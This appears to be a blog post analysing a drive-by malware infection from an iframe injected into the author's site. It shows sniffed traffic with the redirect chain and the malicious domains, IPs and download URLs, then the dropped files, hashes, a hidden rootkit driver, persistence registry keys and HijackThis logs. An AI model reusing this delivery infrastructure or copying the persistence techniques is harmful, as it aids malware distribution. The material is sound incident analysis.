See Website with hidden iframe and Malware Analysis

>> Thursday, November 26, 2009


All begin when today morning (16/10/2008) at 13:00 I checked html code of index.php and I saw something suspicious inside:



Our index.php and other 4 *.php pages was infected with this iframe from 11:00am to 13:00am and fortunately we analyze the code of our site every 2/3 hours and we removed immediatly the infected code.
So I decided to analyze that iframe code and I used an old version of Internet Explorer 6.0 unpatched to be sure to be infected and get the malware in my system for analysis.
I visited that iframe and after some seconds started a massive malware infection in my system with a big amount of different IPs connections.
Here is result of the network traffic sniffed (I removed some parts cause were too long, you can scroll down for download the complete log):
================================================
Index : 14
Protocol : TCP
Local Address : 192.168.1.5
Remote Address : 59.125.229.71
Local Port : 1045
Remote Port : 80
Local Host :
Remote Host : 59-125-229-71.HINET-IP.hinet.net
Service Name : http
Packets : 11
Data Size : 1.223 Bytes
Total Size : 1.995 Bytes
Capture Time : 16/10/2008 20.57.53:796
==================================================
GET /in.cgi?id111 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: fstat.cn
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Thu, 16 Oct 2008 18:54:43 GMT
Server: Apache/2
Set-Cookie: SL_id111_0000=_10000_; domain=fstat.cn; path=/; expires=Fri, 17-Oct-2008 18:54:43 GMT
Set-Cookie: TSUSER=id111; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=fstat.cn
Location: http://mmcounter.com/tds/in.cgi?default
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 162
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

==================================================
Index : 15
Protocol : TCP
Local Address : 192.168.1.5
Remote Address : 94.102.50.130
Local Port : 1046
Remote Port : 80
Local Host :
Remote Host :
Service Name : http
Packets : 11
Data Size : 1.166 Bytes
Total Size : 1.949 Bytes
Capture Time : 16/10/2008 20.57.58:609
==================================================
GET /tds/in.cgi?default HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mmcounter.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Thu, 16 Oct 2008 18:56:22 GMT
Server: Apache/2
Set-Cookie: SL_default_0000=_1_; domain=mmcounter.com; path=/; expires=Fri, 17-Oct-2008 18:56:22 GMT
Location: http://lite.ff-freehosting.com/all/index.php
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 165
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

==================================================
Index : 18
Protocol : TCP
Local Address : 192.168.1.5
Remote Address : 94.102.50.130
Local Port : 1047
Remote Port : 80
Local Host :
Remote Host :
Service Name : http
Packets : 19
Data Size : 8.912 Bytes
Total Size : 10.020 Bytes
Capture Time : 16/10/2008 20.58.03:796
==================================================
GET /all/index.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: lite.ff-freehosting.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2008 18:56:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 2000 00:00:00 GMT
Last-Modified: Thu, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 7880
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

==================================================
Index : 20
Protocol : TCP
Local Address : 192.168.1.5
Remote Address : 66.232.116.2
Local Port : 1051
Remote Port : 80
Local Host :
Remote Host :
Service Name : http
Packets : 395
Data Size : 248.424 Bytes
Total Size : 264.640 Bytes
Capture Time : 16/10/2008 20.58.21:796
==================================================
GET /all/controller.php?action=bot&entity_list=&uid=2&first=1&guid=0&rnd=982735 HTTP/1.1
Host: 66.232.116.2
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2008 18:58:18 GMT
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.2.6
Version: 1
Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983332
Magic-Number: 32|0|85:214:242:0:116:131:195:213:214:77:222:73
Connection: close
Content-Type: text/html; charset=utf-8

==================================================
Index : 23
Protocol : TCP
Local Address : 192.168.1.5
Remote Address : 94.102.50.130
Local Port : 1053
Remote Port : 80
Local Host :
Remote Host :
Service Name : http
Packets : 34
Data Size : 18.249 Bytes
Total Size : 19.863 Bytes
Capture Time : 16/10/2008 20.58.38:281
==================================================
GET /all/load.php?id=45751&spl=5 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: lite.ff-freehosting.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2008 18:57:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.6
Accept-Ranges: bytes
Content-Disposition: inline; filename=load.exe
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 17475
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

==================================================
Index : 25
Protocol : TCP
Local Address : 192.168.1.5
Remote Address : 66.232.116.2
Local Port : 1055
Remote Port : 80
Local Host :
Remote Host :
Service Name : http
Packets : 57
Data Size : 32.344 Bytes
Total Size : 34.968 Bytes
Capture Time : 16/10/2008 20.58.46:234
==================================================
GET /all/controller.php?action=bot&entity_list=&uid=2&first=1&guid=0&rnd=982735 HTTP/1.1
Host: 66.232.116.2
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2008 18:58:42 GMT
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.2.6
Version: 1
Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983188
Magic-Number: 32|0|185:234:45:115:54:0:22:233:187:219:150
Connection: close
Content-Type: text/html; charset=utf-8

If you want to download the complete log of Internet traffic sniffed click on the link below:
Here you can download the saved index.html page of the malware’s site that is present in network sniffer logs (there is some decryption functions and encrypted code):
index ZIP (password is infected)
While internet traffic sniffer was active, the computer was infected with a malware that was downloaded in Temp Folder with filename as winMN448Eewaoz.exe and after this file was executed hidden and dropped a file in C:\WINDOWS\system32\ with name as ~.exe that was downloaded from this GET query:
GET /all/load.php?id=45751&spl=5 HTTP/1.1
Here there is the result from our Online Virus Scanner of the malware “~.exe” that was analyzed:
File Info Description
Report Generated: 19.10.2008 at 19.47.59 (GMT 1)
Time for scan: 22 seconds
Filename: ~.exe
File size: 25 KB
MD5 Hash: D0E01992354F6591C4881C838F6988C8
SHA1 Hash: 8F56E93CEE4B4BAEDE3FFAA888E475BD5D55BE33
CRC32: 814955469
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
RarSFX Archive: Nothing found
Cabinet Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 5 on 23
Antivirus Detections
A-squared Nothing found!
AntiVir Contains detection pattern of the dropper DR/Delphi.Gen
Avast Win32:Trojan-gen {Other} (0)
AVG Virus found Win32/Heur
BitDefender Nothing found!
ClamWin Nothing found!
Comodo Nothing found!
Dr.Web Nothing found!
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Nothing found!
IkarusT3 Nothing found!
Kaspersky Trojan.Win32.Buzus.abkg
McAfee Nothing found!
NOD32 v3 Nothing found!
Norman Nothing found!
Panda Nothing found!
QuickHeal Nothing found!
Solo Antivirus Nothing found!
Sophos Nothing found!
TrendMicro Nothing found!
VBA32 Malware-Cryptor.Win32.Xip
VirusBuster Nothing found!

Below there is a list of PE Import Tables of the malware with filename as ~.exe:
+KERNEL32.DLL
GetCurrentThreadId
ExitProcess
RtlUnwind
RaiseException
GetCommandLineA
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
FreeLibrary
HeapFree
HeapReAlloc
HeapAlloc
GetProcessHeap
+KERNEL32.DLL
LoadLibraryA
GetProcAddress
+GDI32.DLL
SetPixel
GetPixel
CreateDCA
Here is a small analysis of that malware:
-Downloaded in Temp Folder as winMN448Eewaoz.exe
-Copyed in C:\WINDOWS\system32\~.exe
-Injected code into svchost.exe
-Opened remote connections with IP: 66.232.116.2 on port 80
After some time others files were downloaded in my system, here there is the complete logs of the network traffic sniffed of the second part of the malware infection:
Download Sniffer Logs Part 2
And now begin the funny time :)
I started Rootkit Unhooker and I noticed some suspicious drivers in the Driver List that made me think of a possible Rootkit activity:
1)

2)

3)

If you click properties on driver column of rnvrnrrv.sys you get this:

Why is 0 bytes and no info on creation/modification etc. ? …
Now lets look in Stealth Code :

Here you can download Dumped files:
Download
Below there is how look the Hidden Files column:

Driver C:\WINDOWS\system32\rnvrnrrv.sys is loaded and hidden from explorer search (seem that the Driver hide every file with name *rnvrnrrv*). Now lets try to search some info in Regedit:

It is not much but are useful info.
Below there are Import Tables of rnvrnrrv.sys:
+NTOSKRNL.EXE
ExAllocatePoolWithTag
ExFreePoolWithTag
ZwQuerySystemInformation
RtlImageDirectoryEntryToData
memcpy
memset
_except_handler3
Below there are some other useful info of a new created process with name as mbqlmfin.exe (I am using Process Explorer in images below):


Here is a list of some Created Files by the malware (there is no order):
-C:\WINDOWS\msauc.exe
-C:\WINDOWS\system32\*randomnumber*.cpx
-C:\WINDOWS\system32\*randomnumber*.dat
-C:\WINDOWS\system32\wpv*randomnumber*.cpx
-C:\WINDOWS\system32\msansspc.dll
-%TempFolder%\winMN448Eewaoz.exe
-%ProgramFiles%\xeifh\SetActAdm.dll
-%ProgramFiles%\Internet Explorer\msansspc.dll
-C:\WINDOWS\system32\drivers\rnvrnrrv.sys
-C:\WINDOWS\system32\shell31.dll
-C:\WINDOWS\system32\fqqtiaag.tmp
-C:\WINDOWS\TDEZAALK.exe
-C:\%DocumentsAndSettings%\All Users\%ApplicationData%\almrahwt\mbqlmfin.exe
Below there are PE Import Tables of above files:
msauc.exe
+KERNEL32.DLL
GlobalUnlock
OutputDebugStringA
LockResource
SetErrorMode
lstrcmpiA
CompareStringA
ReadFile
FileTimeToSystemTime
SetConsoleCtrlHandler
lstrcatA
IsValidCodePage
GetDriveTypeA
GetCurrentProcessId
+MSVCRT.DLL
_initterm
_strtime
abs
_waccess
__setusermatherr
mbqlmfin.exe
+KERNEL32.DLL
GetFileSize
FindFirstFileW
LoadLibraryA
FindResourceExW
CreateProcessW
FindClose
FindFirstChangeNotificationW
FreeLibrary
InterlockedIncrement
GlobalAlloc
ReadProcessMemory
SuspendThread
SetLastError
GetModuleHandleW
TerminateThread
DeleteFileW
VirtualFree
VirtualAlloc
GetFileAttributesExW
ReadFile
SetFilePointer
CloseHandle
ResetEvent
GetProcAddress
CreateFileW
GetDriveTypeW
GetCurrentProcessId
GetModuleFileNameW
+USER32.DLL
CreateWindowExW
EnableWindow
DefWindowProcW
LoadImageW
GetWindowThreadProcessId
PostQuitMessage
TranslateMessage
GetSysColor
RedrawWindow
RegisterHotKey
SetForegroundWindow
SystemParametersInfoW
LoadIconW
SendDlgItemMessageW
FillRect
RegisterWindowMessageW
ReleaseCapture
RegisterClassExW
PostMessageW
ReleaseDC
DrawTextW
GetCursorPos
DestroyMenu
GetWindowDC
CreatePopupMenu
TDEZAALK.exe
+KERNEL32.DLL
ReadFile
MultiByteToWideChar
GetModuleHandleA
GetFileSize
FlushInstructionCache
GetTickCount
VirtualProtect
GetLastError
GetProcAddress
LocalFree
LoadLibraryA
Sleep
LocalAlloc
+USER32.DLL
wsprintfA
wvsprintfA
+KERNEL32.DLL
VirtualProtect
Below there is some strange content of some files *randomnumber*.cpx:
[Windows Latin 1(1252)/850 (Multilingual-Latin 1)]
130:44
131:159
132:44
133:95
134:253
135:252
137:37
138:83
139:60
140:79
145:96
146:39
147:34
148:34
150:45
151:95
154:115
155:62
156:111
159:89
160:32
161:173
162:189
163:156
164:207
165:190
166:221
167:245
168:249
169:184
170:166
171:174
172:170
173:240
174:169
175:238

That is similar to sniffed traffic like:

Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983428
Magic-Number: 512|0|183:173:108:162:10:149:128:204

Below there are some Registry Keys Created to startup:
-HKLM\Software\Microsoft\Windows\CurrentVersion\Run\lsass driver
-HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TDEZAALK
-HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\[51m3u05p5i]
Below there are Logs of Trend Micro HijackThis of before and after infection:
Before:
Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 23.54.15, on 16/10/2008
Platform: Windows XP SP2
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Documents and Settings\Laboratorio06\Desktop\HijackThis 2.00 beta\HiJackThis_v2.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - Default URLSearchHook is missing
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O22 - SharedTaskScheduler: Precaricatore Browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Daemon di cache delle categorie di componenti - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll

After:
Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 0.09.55, on 17/10/2008
Platform: Windows XP SP2
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\wpv286.cpx
C:\WINDOWS\system32\svchost.exe
C:\Documents and Settings\All Users\Dati applicazioni\almrahwt\mbqlmfin.exe
C:\Documents and Settings\Laboratorio06\Desktop\HijackThis 2.00 beta\HiJackThis_v2.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - Default URLSearchHook is missing
O4 - HKLM\..\Run: [lsass driver] C:\WINDOWS\msauc.exe
O4 - HKLM\..\Run: [TDEZAALK] %systemroot%\TDEZAALK.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKLM\..\Policies\Explorer\Run: [51m3u05p5i] C:\Documents and Settings\All Users\Dati applicazioni\almrahwt\mbqlmfin.exe
O21 - SSODL: SetActAdm - {002069A6-342F-036E-4AAB-03598A9EEFCE} - C:\Programmi\xeifh\SetActAdm.dll (file missing)
O22 - SharedTaskScheduler: Precaricatore Browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Daemon di cache delle categorie di componenti - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: MS Software Shadow Copy Provider SwPrvSchedule (SwPrvSchedule) - Unknown owner - C:\WINDOWS\system32\wpv5338.cpx.exe (file missing)

What can we learn from this Analysis ?
1) Always use up-to-date browser
2) Always use an AntiVirus and a Firewall
3) Check HTML code of your site frequently
4) Inform admin of site if you notice something suspicious in the HTML code
5) How to detect a possible Rootkit Activity in your system
Robert



blog comments powered by Disqus

Post a Comment

Related Posts with Thumbnails

  © Blogger template Webnolia by Ourblogtemplates.com 2009

Back to TOP